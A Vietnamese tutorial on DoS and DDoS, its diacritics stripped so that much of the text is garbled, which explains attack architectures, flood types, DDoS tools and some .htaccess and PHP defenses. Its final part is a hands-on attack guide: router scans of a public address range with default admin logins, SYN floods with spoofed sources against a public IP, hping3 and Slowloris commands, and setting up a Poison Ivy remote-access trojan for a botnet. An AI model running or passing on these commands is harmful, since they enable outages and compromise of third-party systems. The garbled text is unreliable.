hi cc gi tin n a ch ca victim . Vic cng mt lc nh n c nhiu gi tin thng qua cc server l n ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt n i Internet n 20
ginv i ng truyn bnh thng cng c th nh b t c h th ng c ng truyn t t nht th gi i nu nh ta khng kp ngn chn . Trang WebHVA ca chng ta cng b DoS va ri bi cch tn cng ny y III. t s phng ph p phng h ng DOS
DoS c th lm tiu t n rt nhiu thi gian cng nh tin bc, v v y, cn phi c nhng bin ph p phng ch ng: M hnh h th ng phi c xy dng hp l, tr nh ph thuc ln nhau qu mc d dn n mt b ph n gp s c s lm c h th ng b trc trc. Thit l p password bo v c c thit b hay c c ngun ti nguyn quan trng. Thit l p c c mc x c thc i v i ngi dng cng nh c c ngun tin trn mng (c c th ng tin c p nh t nh tuyn gia c c router cng nn thit l p ch x c thc) Xy dng h th ng lc th ng tin trn router, firewall v h th ng bo v ch ng li SYN flood. h chp nh n c c dch v cn thit, tm thi dng c c dch v cha c yu cu cung cp hoc kh ng s dng. Xy dng h th ng nh mc, gi i hn cho ngi s dng ngn nga trng hp ngi dng c c mu n li dng c c ti nguyn trn server tn c ng ch nh server hay mng, server kh c. Lin tc c p nh t, nghin cu, kim tra ph t hin c c l hng bo m t v c bin ph p khc phc kp thi. S dng c c bin ph p kim tra hot ng ca h th ng mt c ch lin tc ph t hin ngay nhng hnh ng bt bnh thng. Xy dng h th ng d phng.
21
Ph n III : DDOS
I: Kh i nim DDos (Distributed Denial Of Service) Distributed Denial Of Service (DDoS) l k thu t tn c ng lm c c ISP lo u, gi i hacker ch nh th ng th kh ng c ng nh n DdoS l k thu t tn c ng ch nh th ng. Th nhng lack hat ang c rt nhiu u th khi trin khai tn c ng bng k thu t DdoS. II: c giai on ca cuc tn c ng DDos ao gm 3 giai o n: 1 Giai on chun b: hun b c ng c quan trng ca cuc tn c ng, c ng c ny th ng thng hot ng theo m hnh client-server. Hacker c th vit phn mm ny hay down load mt c ch d dng, theo th ng k tm thi c khong hn 10 c ng c DDoS c cung cp min ph trn mng (c c c ng c ny s phn t ch chi tit vo phn sau) K tip, dng c c k thu t hack kh c nm trn quyn mt s host trn mng. tin hnh ci t c c software cn thit trn c c host ny, vic cu hnh v th nghim ton b attack-netword (bao gm mng l i c c m y b li dng cng v i c c software c thit l p trn , m y ca hacker hoc mt s m y kh c c thit l p nh im ph t ng tn c ng) cng s c thc hin trong giai on ny. 2 Giai on x c nh mc tiu v thi im Sau khi x c nh mc tiu ln cu i, hacker s c hot ng iu chnh attacknetword chuyn h ng tn c ng v ph a mc tiu. Yu t thi im s quyt nh mc thit hi v t c p ng ca mc tiu i v i cuc tn c ng. 3 Pht ng tn c ng v xa du vt ng thi im nh, hacker ph t ng tn c ng t m y ca mnh, lnh tn c ng ny c th i qua nhiu cp mi n host thc s tn c ng. Ton b attacknetwork (c th ln n hng ngn m y), s vt cn nng lc ca server mc tiu lin tc, ngn chn kh ng cho n hot ng nh thit k. Sau mt khong thi gian tn c ng th ch hp, hacker tin hnh xa mi du vt c th truy ngc n mnh, vic ny i hi trnh kh c cao v kh ng tuyt i cn thit III i n tr tng quan a os atta k-network Nhn chung DDoS attack-network c hai m hnh chnh: M hnh Agent Handler M hnh IRC Based
22
Agent -Handler
IRC - Based
Secret/private channel
Public channel
TCP
UDP
ICMP
TCP
UDP
ICMP
1: M hnh Agent Handler Theo m hnh ny, attack-network gm 3 thnh phn: Agent, lient v Handler lient : l software c s hacker iu khin mi hot ng ca attack- network Handler : l mt thnh phn software trung gian gia Agent v lient Agent : l thnh phn software thc hin s tn c ng mc tiu, nh n iu khin t Client thng qua cc Handler Kin trc attack-network kiu Agent Handler
Attacker Attacker
Handler
Handler
Handler
Handler
Agent
Agent
Agent
Agent
Agent
Victim
Attacker s t lient giao tip v i cc1 Handler x c nh s lng Agent ang online, iu chnh thi im tn c ng v c p nh t c c Agent. Ty theo c ch attacker cu hnh attack-network, c c Agent s chu s qun l ca mt hay nhiu Handler. Th ng thng Attacker s t Handler software trn mt Router hay mt server c lng traffic lu th ng nhiu. Vic ny nhm lm cho c c giao tip gia lient, handler v Agent kh b ph t hin. c gia tip ny th ng thng xy ra trn cc protocol TCP, UDP hay I MP. h nhn thc s ca c c Agent th ng thng 23
kh ng h hay bit h b li dng vo cuc tn c ng kiu DDoS, do h kh ng kin thc hoc c c chng trnh ackdoor Agent ch s dng rt t ti nguyn h th ng lm cho hu nh kh ng th thy nh hng g n hiu nng ca h th ng. 2 :M hnh IRC Based Internet Relay hat (IR ) l mt h th ng online chat multiuser, IR cho php User to mt kt n i n multipoint n nhiu user kh c v chat thi gian thc. Kin trc c IR network bao gm nhiu IR server trn khp internet, giao tip v i nhau trn nhiu knh (channel). IR network cho php user to ba loi channel: public, private v serect. Public channel: ho php user ca channel thy IR name v nh n c message ca mi user kh c trn cng channel Private channel: c thit k giao tip v i c c i tng cho php. Kh ng cho php c c user kh ng cng channel thy IR name v message trn channel. Tuy nhin, nu user ngoi channel dng mt s lnh channel locator th c th bit c s tn ti ca private channel . Secrect channel : tng t private channel nhng kh ng th x c nh bng channel locator. Kin trc attack-network ca kiu IRC-Base
Attacker Attacker
IRC NETWORK
Agent
Agent
Agent
Agent
Agent
Victim
IRC ased net work cng tng t nh Agent Handler network nhng m hnh ny s dng c c knh giao tip IR lm phng tin giao tip gia lient v Agent (kh ng s dng Handler). S dng m hnh ny, attacker cn c thm mt s li th kh c nh: + c giao tip d i dng chat message lm cho vic ph t hin chng l v cng kh khn + IR traffic c th di chuyn trn mng v i s lng l n m kh ng b nghi ng + Kh ng cn phi duy tr danh s ch c c Agent, hacker ch cn logon vo IR server l c th nh n c report v trng th i c c Agent do c c channel gi v.
24
+ Sau cng: IR cng l mt m i trng file sharing to iu kin ph t t n c c Agent code ln nhiu m y kh c. IV: Phn Lo i ki u t n ng os Nhn chung, c rt nhiu bin th ca k thu t tn c ng DDoS nhng nu nhn d i gc chuyn m n th c th chia c c bin th ny thnh hai loi da trn mch ch tn c ng: Lm cn kit bng th ng v lm cn kit ti nguyn h th ng. D i y l s m t s phn loi c c kiu tn c ng DDoS.
DDoS attack
Resource Deleption
Flood Attack
Amplification Attack
UDP
ICMP
Smuft attack
Flaggle Attack
TCP SYS
Attack
IP @ Attack
Direct Attack
Loop Attack Spoof source Attack Spoof source Attack Spoof source Attack Spoof source Attack
1. Nhng kiu tn c ng lm cn kit bng th ng andWith Depletion Attack c thit k nhm lm trng ng p mng mc tiu v i nhng traffic kh ng cn thit, v i mc ch lm gim t i thiu kh nng ca c c traffic hp l n c h th ng cung cp dch v ca mc tiu. hai loi andWith Depletion Attack: Flood attack: iu khin c c Agent gi mt lng l n traffic n h th ng dch v ca mc tiu, lm dch v ny b ht kh nng v bng th ng. Amplification attack: iu khin c c Agent hay lient t gi message n mt a ch IP broadcast, lm cho tt c c c m y trong subnet ny gi message n h th ng dch v ca mc tiu. Phng ph p ny lm gia tng traffic kh ng cn thit, lm suy gim bng th ng ca mc tiu. 1.1. Flood attack Trong phng ph p ny, c c Agent s gi mt lng l n IP traffic lm h th ng dch v ca mc tiu b ch m li, h th ng b treo hay t n trng th i hot ng bo ha. Lm cho c c User thc s ca h th ng kh ng s dng c dch v.
25
Ta c th chia Flood Attack thnh hai loi: UDP Flood Attack: do t nh cht connectionless ca UDP, h th ng nh n UDP message ch n gin nh n vo tt c c c packet mnh cn phi x l. Mt lng l n c c UDP packet c gi n h th ng dch v ca mc tiu s y ton b h th ng n ngng t i hn. c UDP packet ny c th c gi n nhiu port ty hay ch duy nht mt port. Th ng thng l s gi n nhiu port lm cho h th ng mc tiu phi cng ra x l phn h ng cho c c packet ny. Nu port b tn c ng kh ng sn sng th h th ng mc tiu s gi ra mt I MP packet loi destination port unreachable. Th ng thng c c Agent software s dng a ch IP gi che giu hnh tung, cho nn c c message tr v do kh ng c port x l s dn n mt i ch Ip kh c. UDP Flood attack cng c th lm nh hng n c c kt n i xung quanh mc tiu do s hi t ca packet din ra rt mnh. I MP Flood Attack: c thit k nhm mc ch qun l mng cng nh nh v thit b mng. Khi c c Agent gi mt lng l n I MP_E HO_REPLY n h th ng mc tiu th h th ng ny phi reply mt lng tng ng Packet tr li, s dn n nghn ng truyn. Tng t trng hp trn, a ch IP ca c Agent c th b gi mo. 2.2. Amplification Attack Amplification Attack nhm n vic s dng c c chc nng h tr a ch IP broadcast ca c c router nhm khuych i v hi chuyn cuc tn c ng. hc nng ny cho php bn gi ch nh mt a ch IP broadcast cho ton subnet bn nh n thay v nhiu a ch. Router s c nhim v gi n tt c a ch IP trong subnet packet broadcast m n nh n c. Attacker c th gi broadcast message trc tip hay th ng qua mt s Agent nhm lm gia tng cng ca cuc tn c ng. Nu attacker trc tip gi message, th c th li dng c c h th ng bn trong broadcast network nh mt Agent.
26
Attacker/Agent
VICTIM
Amplifier
Amplifier Network System th chia amplification attack thnh hai loi, Smuft va Fraggle attack: Smuft attack: trong kiu tn c ng ny attacker gi packet n network amplifier (router hay thit b mng kh c h tr broadcast), v i a ch ca nn nhn. Th ng thng nhng packet c dng l I MP E HO REQUEST, c c packet ny yu cu yu cu bn nh n phi tr li bng mt I MP E HO REPLY packet. Network amplifier s gi n I MP E HO REQUEST packet n tt c c c h th ng thuc a ch broadcast v tt c c c h th ng ny s REPLY packet v a ch IP ca mc tiu tn c ng Smuft Attack. Fraggle Attack: tng t nh Smuft attack nhng thay v dng I MP ECHO REQUEST packet th s dng UDP E HO packet gi m mc tiu. Th t ra cn mt bin th kh c ca Fraggle attack s gi n UDP E HO packet n chargen port (port 19/UNIX) ca mc tiu, v i a ch bn gi l echo port (port 7/UNIX) ca mc tiu, to nn mt vng lp v hn. Attacker ph t ng cuc tn c ng bng mt E HO REQUEST v i a ch bn nh n l mt a ch broadcast, ton b h th ng thuc a ch ny l p tc gi REPLY n port echo ca nn nhn, sau t nn nhn mt E HO REPLY li gi tr v a ch broadcast, qu trnh c th tip din. y ch nh l nguyn nhn Flaggle Attack nguy him hn Smuft Attack rt nhiu. 2: Nhng kiu tn c ng lm cn kit ti nguyn Theo nh ngha: Resource Deleption Attack l kiu tn c ng trong Attacker gi nhng packet dng c c protocol sai chc nng thit k, hay gi nhng packet v i dng lm tt nghn ti nguyn mng lm cho c c ti nguyn ny kh ng phc v user th ng thng kh c c 27
2.1. Protocol Exploit Attack T P SYS Attack: Transfer ontrol Protocol h tr truyn nh n v i tin c y cao nn s dng phng thc bt tay gia bn gi v bn nh n tr c khi truyn d liu. c u tin, bn gi gi mt SYN REQUEST packet (Synchronize). n nh n nu nh n c SYN REQUEST s tr li bng SYN/A K REPLY packet. c cu i cng, bn gi s truyn packet cu i cng A K v bt u truyn d liu. SYS
TCP Client
Client Port 1024-65535
SYN/ACK
TCP Server
80
ACK
Nu bn server tr li mt yu cu SYN bng mt SYN/A K REPLY nhng kh ng nh n c A K packet cu i cng sau mt khong thi gian quy nh th n s resend li SYN/A K REPLY cho n ht thi gian timeout. Ton b ti nguyn h th ng d tr x l phin giao tip nu nh n c A K packet cu i cng s b phong ta cho n ht thi gian timeout.
SYS packet with a deliberately fraudulent (spoofed) source IP return address
SYN
?
SYS/ACK
Nm c im yu ny, attacker gi mt SYN packet n nn nhn v i a ch bn gi l gi mo, kt qu l nn nhn gi SYN/A K REPLY n mt a ch kh v s kh ng bao gi nh n c A K packet cu i cng, cho n ht thi gian timeout nn nhn m i nh n ra c iu ny v gii phng c c ti nguyn h th ng. Tuy nhin, nu lng SYN packet gi mo n v i s lng nhiu v dn d p, h th ng ca nn nhn c th b ht ti nguyn.
Client SYN
SYN/ACK SYN/ACK
Server
Attacker/Agent SYN
Server
SYN/ACK
ACK
28
PUSH = ACK Attack: Trong TCP protocol, cc packet c cha trong buffer, khi buffer y th c c packet ny s c chuyn n ni cn thit. Tuy nhin, bn gi c th yu cu h th ng unload buffer tr c khi buffer y bng c ch gi mt packet v i PUSH v A K mang gi tr l 1. Nhng packet ny lm cho h th ng ca nn nhn unload tt c d liu trong T P buffer ngay l p tc v gi mt A K packet tr v khi thc hin xong iu ny, nu qu trnh c din ra lin tc v i nhiu Agent, h th ng s kh ng th x l c lng l n packet gi n v s b treo. 2.2. Malformed Packet Attack Malformed Packet Attack l c ch tn c ng dng c c Agent gi c c packet c cu trc kh ng ng chun nhm lm cho h th ng ca nn nhn b treo. hai loi Malformed Packet Attack: IP address attack: dng packet c a ch gi v nh n gi ng nhau lm cho h iu hnh ca nn nhn kh ng x l ni v b treo. IP packet options attack ngu nhin ha vng OPTION trong IP packet v thit l p tt c c c bit QoS ln 1, iu ny lm cho h th ng ca nn nhn phi t n thi gian phn t ch, nu s dng s lng l n Agent c th lm h th ng nn nhn ht kh nng x l. V: t s t nh a ng o atta k
DDoS software Tool Attack Network Comminication
Agent Setup
OS supported
Instalation
Protocol
Encruption
Unix
Active
Passive
Yes
No
TCP UDP
ICMP
Actively Poll
Live&wait
Bugged website
Corrupted File
Agent Handlerl
IRC Basedl
YES Private/Serect
No Public Backdoor Trojan Buffer Overlfow Client Handlerl Agent Handlerl None
rt nhiu im chung v mt software ca c c c ng c DDoS attack. th k ra mt s im chung nh: c ch ci Agent software, phng ph p giao tip gia c c attacker, handler v Agent, im chung v loi h iu hnh h tr c c c ng c ny. S trn m t s so s nh tng quan gia c c c ng c tn c ng DDoS ny.
29
1:
h th
i t
gent
Attacker c th dng phng ph p active v passive ci t agent software ln c c m y kh c nhm thit l p attack-network kiu Agent-Handler hay IRC-based. ch ci t Active: Scaning: dng c c c ng c nh Nmap, Nessus tm nhng s h trn c c h th ng ang online nhm ci t Agentsoftware. h , Nmap s tr v nhng th ng tin v mt h th ng c ch nh bng a ch IP, Nessus tm kim t nhng a ch IP bt k v mt im yu bit tr c no . ackdoor: sau khi tm thy c danh s ch c c h th ng c th li dng, attacker s tin hnh xm nh p v ci Agentsoftware ln c c h th ng ny. rt nhiu th ng tin sn c v c ch thc xm nh p trn mng, nh site ca t chc ommon Vulnerabilities and Exposures ( VE), y lit k v phn loi trn 4.000 loi li ca tt c c c h th ng hin c. Th ng tin ny lu n sn sng cho c gi i qun tr mng ln hacker. Trojan: l mt chng trnh thc hin mt chc nng th ng thng no , nhng li c mt s chc nng tim n phc v cho mc ch ring ca ngi vit m ngi dng kh ng th bit c. th dng trojan nh mt Agent software. Buffer Overflow: t n dng li buffer overflow, attacker c th lm cho chu trnh thc thi chng trnh th ng thng b chuyn sang chu trnh thc thi chng trnh ca hacker (nm trong vng d liu ghi ). th dng c ch ny tn c ng vo mt chng trnh c im yu buffer overflow chy chng trnh Agent software. ch ci t passive ug Website: attacker c th li dng mt s li ca web brower ci Agent software vo m y ca user truy c p. Attaker s to mt website mang ni dung tim n nhng code v lnh t by user. Khi user truy c p ni dung ca website, th website download v ci t Agent software mt c ch b m t. Microsoft Internet Explorer web browser thng l mc tiu ca c ch ci t ny, v i c c li ca ActiveX c th cho php IE brower t ng download v ci t code trn m y ca user duyt web. orrupted file: mt phng ph p kh c l nhng code vo trong c c file th ng thng. Khi user c hay thc thi c c file ny, m y ca h l p tc b nhim Agent software. Mt trong nhng k thu t ph bin l t tn file rt di, do default ca c c h iu hnh ch hin th phn u ca tn file nn attacker c th gi km theo email cho nn nhn file nh sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, do ch thy phn Iloveyou.txt hin th nn user s m file ny c v l p tc file ny c thc thi v Agent code c ci vo m y nn nhn. Ngoi ra cn nhiu c ch kh c nh ngy trang file, ghp file Rootkit: l nhng chng trnh dng xa du vt v s hin din ca Agent hay Handler trn m y ca nn nhn. Rootkit thng c dng trn Hander software c ci, ng vai tr xung yu cho s hot ng ca attack-network hay trn cc m i trng m kh nng b ph t hin ca Handler l rt cao. Rootkit rt t khi dng trn c c Agent do mc quan trng ca Agent kh ng cao v nu c mt mt s Agent cng kh ng nh hng nhiu n attack-network. 30
2: Giao tip trn Attack-Network Protocol: giao tip trn attack-network c th thc hin trn nn c c protocol TCP, UDP, ICMP. M ha c c giao tip: mt vi c ng c DDoS h tr m ha giao tip trn ton b attack-network. Ty theo protocol c s dng giao tip s c c c phng ph p m ha th ch hp. Nu attack-network dng IR -based th private v secrect channel h tr m ha giao tip. ch k ch hot Agent: c hai phng ph p ch yu k ch hot Agent. ch th nht l Agent s thng xuyn qut thm d Handler hay IR channel nh n ch th (active Agent). ch th hai l Agent ch n gin l nm vng ch ch th t Handler hay IRC Channel. 3: c nn tng h tr Agent
c ng c DDoS th ng thng c thit k hot ng tng th ch v i nhiu h iu hnh kh c nhau nh: Unix, Linux, Solaris hay Windows. c thnh phn ca attack-network c th v n hnh trn c c m i trng h iu hnh kh c nhau. Th ng thng Handler s v n hnh trn c c h chy trn c c server l n nh Unix, Linux hay Solaris. Agent th ng thng chy trn h iu hnh ph bin nht l windows do cn s lng l n d khai th c. VI: ts ng o
Da trn nn tng chung ca phn trn, c nhiu c ng c c vit ra, th ng thng c c c ng c ny l m ngun m nn mc phc tp ngy cng cao v c nhiu bin th m i l. 1: ng c DDoS dng Agent Handler: TrinOO: l mt trong c c c ng c DDoS u tin c ph t t n rng ri. TrinOO c kin trc Agent Handler, l c ng c DDoS kiu andwidth Depletion Attack, s dng k thu t UDP flood. c version u tin ca TrinOO khng h tr gi mo a ch IP. TrinOO Agent c ci t li dng li remote buffer overrun. Hot ng trn h iu hnh Solaris 2.5.1 Red Hat Linux 6.0. Attack network giao tip dng T P (attacker client v handler) v UDP (Handler v Agent). M ha giao tip dng phng ph p m ha i xng gia lient, handler v Agent. Tribe Flood Network (TFN): Kiu kin trc Agent Handler, c ng c DDoS ho tr kiu andwidth Deleption Attack v Resourse Deleption Attack. S dng k thu t UDP flood, I MP Flood, T P SYN v Smurf Attack. c version u tin kh ng h tr gi mo a ch IP, TFN Agent c ci t li dng li buffer overflow. Hot ng trn h iu hnh Solaris 2.x v Red Hat Linux 6.0. Attack Network giao tip dng I MP E HO REPLY packet (TFN2K h tr thm T P/UDP v i t nh nng chn protocol ty ), kh ng m ha giao tip (TFN2K h tr m ha)
31
Stacheldraht: l bin th ca TFN c thm kh nng updat Agent t ng. Giao tip telnet m ha i xng gia Attacker v Handler. Shaft: l bin th ca TrinOO, giao tip Handler Agent trn UDP, Attacker Hendle trn Internet. Tn c ng dng k thu t UDP, ICMP v TCP flood. C th tn c ng ph i hp nhiu kiu cng lc. th ng k chi tit cho php attacker bit tnh trng tn tht ca nn nhn, mc quy m ca cuc tn c ng iu chnh s lng Agent. 2. ng c DDoS dng IR Based: ng c DDoS dng IR -based c ph t trin sau c c c ng c dng Agent Handler. Tuy nhin, c ng c DDoS dng IR phc tp hn rt nhiu, do t ch hp rt nhiu c t nh ca c c c ng c DDoS dng Agent Handler. Trinity: l mt in hnh ca c ng c dng ny. Trinity c hu ht c c k thu t tn c ng bao gm: UDP, T P SYS, T P A K, T P fragment, T P NULL, TCP RST, TCP random flag, TCP ESTABLISHED packet flood. N c sn kh nng ngu nhin ha a ch bn gi. Trinity cng h tr T P flood packet v i kh nng ngu nhn t p ONTROL FLAG. Trinity c th ni l mt trong s c c c ng c DDoS nguy him nht. Ngoi ra c th nhc thm v mt s c ng c DDoS kh c nh Knight, c thit k chy trn Windows, s dng k thu t ci t ca troijan back Orifice. Knight dng cc k thu t tn c ng nh SYV, UDP Flood v Urgent Pointer Flooder. Sau cng l Kaiten, l bin th ca Knight, h tr rt nhiu k thu t tn c ng nh: UDP, T P flood, SYN, PUSH + A K attack. Kaiten cng tha hng kh nng ngu nhin ha a ch gi mo ca Trinity.
TI- DDOS
Tn c ng DDOS hay cn c gi tn c ng t ch i dch v n gin c hiu l to ra 1 lt truy c p o t vo mt a ch website ti cng mt thi im no nh sn nhm nh s p m y ch lu tr khin n chy ch m hoc kh ng th chy c na. Th t s th kh ng c phng ph p ch ng DDOS hiu qu nht nhng nu v i mc nh v mang t nh kh ng chuyn khi s dng c c phn mm c l p trnh sn quy m nh l th ta hon ton c th ch ng phng ch ng. h 1: h ng iframe. y l phng ph p c xem l th s nht. K tn c ng s mn 1 website c lt truy c p l n no chn c c iframe h ng v website cn nh ri cho chy lnh refresh (ti li) nhiu ln hoc h vit sn 1 t p tin flash v i c ng dng tng t ri t ln website v khi ngi dng truy c p vo website ny th h v tnh bt c d tr thnh ngi tn c ng website kia. V i hnh thc tn c ng kiu nh th ny bn hon ton c th ch ng li bng c ch chn 1 on m Javascript ch ng chn iframe t c c website kh c n website ca bn. <script language="JavaScript"> 32
Mt hnh thc tn c ng kh c na l dng ph m F5 lin tc c ch , hoc dng mt phn mm c l p trnh sn v i c ng dng tng t (ti li trang web lin tc sau nhng khong thi gian nh sn) ca mt nhm ngi lm cho trang web ca bn ti li (reload) lin tc. Vic ny c th lm t n bng th ng ca trang web hoc lm trang web chy ch m v nhng kt n i o. V i c ch thc tn c ng ny th nu dng c ch mt ch ng coi nh l v ch. Nu bn b tn c ng nh th ny th bn hy thit l p t p tin .htaccess v i ni dung: RewriteCond %{HTTP_REFERER} !^http(s)?://(www.)?daklak.org [NC] RewriteCond %{HTTP_USER_AGENT} !bingbot [NC] RewriteCond %{HTTP_USER_AGENT} !YandexImages [NC] RewriteCond %{HTTP_USER_AGENT} !YandexBot [NC] RewriteCond %{HTTP_USER_AGENT} !Googlebot [NC] RewriteCond %{HTTP_USER_AGENT} !Slurp [NC] RewriteCond %{HTTP_USER_AGENT} !crawler [NC] RewriteCond %{HTTP_USER_AGENT} !msnbot [NC] RewriteCond %{HTTP_USER_AGENT} !alexa [NC] RewriteRule !antiddos.phtml http://daklak.org/antiddos.phtml?%{REQUEST_URI} [ QSA] ng dng ca on htaccess trn l lc nhng referer n t c c site kh c nhng bot tm kim vn hot ng bnh thng. Sau to thm mt mt t p tin antiddos.phtml c ni dung <? $text = $HTTP_SERVER_VARS['QUERY_STRING']; $text = preg_replace("#php\&#si",'php?',$text); echo('<center><a href=http://daklak.org/?'.$text.'><font color="blue">[Click here to c ontinue]</font></a</center>'); ?> n sa daklak.org thnh a ch web bn, sau bn upload 2 t p tin ny ln th mc g c ca website. Nh v y l mi khi truy c p vo website, nu ln u tin th s c th ng b o yu cu nhn chut th bn m i vo c website v c c ln sau s kh ng c v c c phn mm DDOS c l p trnh s b chn li b c click chut vo trang web ln truy c p u tin nn vic ti li trang web ch n thun l 1 trang HTML nh kh ng nh hng nhiu n h th ng. Ch l cch ny ch p dng cho website ang s dng server chy trn nn Linux. h 3: i i h n s k t n i we site t i m t thi i m
Khi mt kh ch truy c p vo website th s to ra mt truy vn kt n i v i c s d liu ( SDL) ly th ng tin v tr v th ng qua hin th ca website. Mi m y ch s c 33
php bao nhiu truy vn kt n i l hn nh v khi vt qu hn mc ny th vic truy c p s kh khn hoc kh ng th truy xut c. c tin tc li dng vo iu ny to ra c c truy c p o, kt n i o th ng qua proxy hay chuyn nghip hn l mng botnet nhm nh s p trang web v ph hng SDL website. hn ch iu ny ta c th ch ng gi i hn s kt n i truy vn tin (lt truy c p) cng mt thi im. n thm dng on m sau vo trang ch ca website. function server_busy($numer) { if (THIS_IS == 'WEBSITE' && PHP_OS == 'Linux' and @file_exists ( '/proc/load avg' ) and $filestuff = @file_get_contents ( '/proc/loadavg' )) { $loadavg = explode ( ' ', $filestuff ); if (trim ( $loadavg [0] ) > $numer) { print '<meta http-equiv="content-type" content="text/html; charset=UTF8" />'; print 'Lng truy c p ang qu ti, mi bn quay li sau vi pht.'; exit ( 0 ); } } } $srv = server_busy ( 1000 ); // 1000 l s ngi truy c p ti 1 thi im on m trn c ngha cho php 1000 ngi online trn website ti mt thi im. Nu vt qua s 1000 th kh ch truy c p s nh n c th ng b o: Lng truy cp ang qu ti. Mi bn quay li sau vi pht. h on m ny ch p dng cho ng n ng l p trnh PHP. h 4: hn IP t n ng ng .hta ess
Khi b IP ca 1 n c no tn c ng nhiu bn c th chn tt c IP ca n c bng c ch vo trang web ny http://www.countryipblocks.net/count...elect-formats/ Sau t ch vo chn .htaccess deny, v tm ountry trong list bn d i, sau copy list IP vo file .htaccess (t file .htaccess root nh) y ch l b n c ch ch ng mang t nh cht gin n p dng cho nhng t tn c ng nh l. website ca mnh hot ng t t v c sc ch ng chi li nhng t tn c ng quy m l n bn nn: - T i u ha website v d bn c th xy dng b nh m (cache) cho website nhm gim s kt n i vo SDL. - La chn nh cung cp hosting lu tr web t t c nhng i ph v i nhng t tn c ng.
34
Ph n 4
ng
nm ts os v os
ht n
ng
1. Ping of Dealth Attack - Trong h iu hnh Window ta c th s dng lnh ping IP -t -l 5000 ping mt destination mt cch lin tc
Nu nh bn mu n m cng mt lc 20 ca s Window ping th ta c th kt hp v i cu lnh For nh sau For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 nh v y chng trnh s m ra cng mt lc 20 ca s window ping lin tc n IP 192.168.1.254
35
2. Syn Flood Attack bi phn ny ta s th thc hin SYN Flood Attack vo router ADSL. u tin ta x c nh xem hin ti ang c bao nhiu router ADSL ang m port 80 bng cng c Nmap Gi s IP Public hin thi ca mnh ang l 118.68.226.103, ta s dng cu lnh nmap sS p 80 118.68.226.1/24 scan
36
V d trong 1 on file scan_adsl.txt c ni dung nh bn d i ngha l IP 118.68.226.7 ang m port 80 Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7) Host is up (0.037s latency). PORT STATE SERVICE 80/tcp open http
Ta vo trnh duyt web kim tra IP trang web ca IP ny v th nh p vo username: admin v password admin mc nh
Ta s thc hin syn flood attack vo port 80 trn router ADSL ny bng cng c syn-flood-alpha1.tar.gz. Ta thc hin qu trnh ci t gi ng nh bn d i.
37
root@bt:~/Desktop# ls scan_adsl.txt syn-flood-alpha1.tar.gz root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz syn-flood/ syn-flood/Makefile syn-flood/gpl.txt syn-flood/syn-flood.cpp root@bt:~/Desktop# cd syn-flood root@bt:~/Desktop/syn-flood# ls gpl.txt Makefile syn-flood.cpp root@bt:~/Desktop/syn-flood# make g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp g++ -o syn-flood syn-flood.o Ta thc hin qu trnh tn cng bng cu lnh bn d i gi ra 100000 gi tin syn root@bt:~/Desktop/syn-flood# ./syn-flood Usage: ./syn-flood --ip IP --port PORT [verbose] -h --help Display this usage information. -i --ip Destination IP address. -p --port Destination port. -n --num Number of packets to send. -v --verbose Print verbose messages. root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000 Sent 1000000 packets. Ta s dng chng trnh Wireshark phn tch qu trnh hot ng ca cng c ny th thy chng trnh gi ra 100000 gi tin T P SYN n victim v router adsl v i IP 118.68.226.7 v i cc source IP l cc IP gi khc nhau.
38
3. S Dng Hping3 thc hin Syn Flood Attack My victim c IP l 192.168.1.101/24 ( Window XP ) v my attacker c IP l 192.168.1.100/24 ( Back Track 5 ) u tin ta thc hin qu trnh scan c c port ang open ca Victim bng cng c Nmap root@bt:~# nmap -sS 192.168.1.101 PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:9F:87:19 (VMware) Ta s dng hping3 SYN Flood vo port ang m l 445 root@bt:~# man hping3 => Kim tra cc thng s ca hping3 root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 => thc hin SYN FLOOD vo victim c IP l 192.168.1.101 -a gi dng IP 192.168.1.254 -p port 445 -S thc hin Syn Flood attack -i --interval wait (uX for X microseconds, for example -i u1000) --fast alias for -i u10000 (10 packets for second) --faster alias for -i u1000 (100 packets for second) --flood sent packets as fast as possible. Don't show replies. 39
root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 c 100000 - ngha l ount, ta s gi 100000 n victim Ti my Victim nu nh b SYN Flood ta kim tra trng thi kt n i bng lnh netstat -ano th thy xut hin rt nhiu kt n i SYN
4. PHP DoS - Ta s thc hin upload source PHP DoS ln mt Web Server, v s dng server ny tn cng mt server khc. - u tin ta thc hin vic upload source vo chng trnh PHP DoS vo Web Server 40
Ta s dng trnh duyt web kt vo trang PHP DoS v thc hin tn cng vo victim no
41
5. Apache DoS Slowloris Slowrist nh hng n Web Server Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer.. cn c c web server ca Window IIS 6.0, IIS 7.0 th kh ng nh hng bi c ng c ny Download source code chng trnh ti trang http://ha.ckers.org/slowloris/slowloris.pl v to thnh file c tn l slowloris.pl G n cho chng trnh c quyn thc thi
42
Thc hin DoS vo mt victim bng cu lnh perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5, ta nn xem thm trong phn help ca chng trnh bit thm ngha ca cc bin
43
6. S Dng Poison Ivy t o Botnet u tin ta cn phi to ra mt file Remote Access Trojan v gi file ny n victim. Sau khi install, my victim tr thnh zombie b iu khin bi attacker. Decompress chng trnh v thc thi file Poison Ivy
44
Ta nh p vo cc thng s :
45
o IP ca m y ng vai tr l server zombie connect v v port tng ng. Mc nh chng trnh dng port 3460. Mt khc ta c th to ra nhiu profile khc nhau, mi profile tng ng v i 1 port trn my attacker o Nh p vo mc ID: v d l server_test o Password ng nh p c th s l password dng static hoc l s dng dynamic key o Tip tc click Next gc phi mn hnh
Tip tc chng trnh s chuyn qua mc Install. Ta cn nh p vo cc thng s sau o HKLM/Run Name: o ActiveX Key Name o Copy File: ta nh p vo v i tn c dng l .exe hoc l dng .scr o Ta c th chn dng opy to Alternate Data Stream n file
46
lick Next chng trnh chuyn phn Advance. Ta c th chn cc tnh nng Key logger, Format dng PE
